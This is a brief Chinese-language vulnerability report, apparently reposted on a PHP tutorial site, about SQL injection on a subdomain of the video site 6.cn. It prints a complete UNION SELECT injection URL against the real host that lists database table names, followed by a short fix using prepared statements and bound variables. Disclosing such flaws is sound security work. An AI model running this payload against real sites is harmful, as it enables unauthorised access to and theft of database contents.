某分站注入。 详细说明: http://m.6.cn/watch_only.php?id=461277 and 1=2 UNION SELECT 1,group_concat(TABLE_NAME),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.TABLES where TABLE_SCHEMA=0x6d36636e-- 修复方案: 使用预编译语句,绑定变量,检查传输数据类型。参考OWASP ESAPI函数。 作者 B1n4ry
查看更多关于六间房一个sql注射 - 网站安全 - 自学php的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did13045